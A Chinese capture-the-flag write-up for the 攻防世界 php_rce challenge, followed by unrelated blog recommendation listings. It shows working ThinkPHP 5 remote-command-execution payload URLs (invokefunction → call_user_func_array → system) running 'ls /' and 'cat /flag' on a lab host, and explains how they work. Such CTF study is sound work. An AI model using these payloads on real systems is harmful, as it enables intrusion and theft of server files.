【攻防世界】php_rce (ThinkPHP5)

进入题目环境,查看页面信息:

页面提示 ThinkPHP V5,猜测存在ThinkPHP5 版本框架的漏洞,于是查找 ThinkPHP5 的攻击POC。

构造 payload: http://61.147.171.105:50126/?s=index/think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=system\&vars\[1\]\[\]=ls /

这个URL的目的是利用 ThinkPHP 框架中的 invokefunction 方法,通过调用 call_user_func_array 函数来执行系统命令 ls /,从而列出服务器根目录下的文件和目录。这种形式的攻击称为远程命令执行(RCE)攻击,如果应用程序没有适当的安全措施来验证和过滤用户提供的输入,可能会导致严重的安全问题。因此,开发者应该在编写代码时严格验证和过滤用户输入,以防止此类攻击。
call_user_func_array()函数:

call_user_func_array(参数一,参数二):

参数一:表示一个回调函数。

参数二:表示传递给这个回调函数的参数,参数二的数据类型为数组。

如果回调函数成功执行,则返回执行结果,否则返回False值。

首先利用 system("ls") 指令查看当前目录下的文件名:

发现当前目录下有文件夹(也有可能是文件) flag,flag值大概率在 flag 中,构造 payload:http://61.147.171.105:50126/?s=index/think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=system\&vars\[1\]\[\]=cd flag& ls /

发现指令未被执行,无回显。

在 Linux 中,cd 命令是用于切换当前工作目录的命令,它只能用于切换到文件夹(目录)中,而不能直接切换到文件中。如果你尝试执行类似 cd fkag 这样的命令,Linux 系统会返回一个错误,提示指定的路径不是一个目录,则说明 flag 是一个文件,直接查询即可。

构造 payload:http://61.147.171.105:50126/?s=index/think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=system\&vars\[1\]\[\]=cat /flag

因为使用 ls /指令查询时 flag 在根目录下 ,故使用 cat /flag 而不是用 cat flag。提交页面如下:

相关推荐
广州灵眸科技有限公司14 小时前
瑞芯微RV1126B开发板(EASY-EAI-PI2) 系统操作-线进程操作
数据库·单片机·嵌入式硬件·算法·php
apihz18 小时前
全国油价查询免费 API 接口详解与调用实战(PHP / Python)
android·python·php·dubbo·天气预报·油价
tommyjiatong19 小时前
解决 WordPress 必须带 index.php 才能访问及无法提交站点地图(Sitemap)的底层原理与方案
php·网站搭建·wordpress
三84421 小时前
PHP+MariaDB/MySQL搭建 社区论坛
mysql·php·mariadb
云云只是个程序马喽1 天前
海外短剧平台搭建方案:私有化源码系统选型|云微短剧系统技术架构拆解
java·php
雅客李2 天前
2026云手机高负载压力测评 安卓云手机多开实测数据
android·智能手机·php
广州灵眸科技有限公司2 天前
xfce桌面旋转说明:基于灵眸科技EASY-EAI-Nano-TB
网络·网络协议·tcp/ip·算法·php
Risehuxyc2 天前
PHP数据类型
开发语言·php
IpdataCloud2 天前
跨区服玩家延迟高怎么办?用IP离线库自动分配到最近服务器
数据库·tcp/ip·github·php·ip
辣椒思密达2 天前
AI出海产品本地化测试:住宅IP在模拟海外用户环境中的实践价值
网络协议·tcp/ip·安全·php·苹果vision pro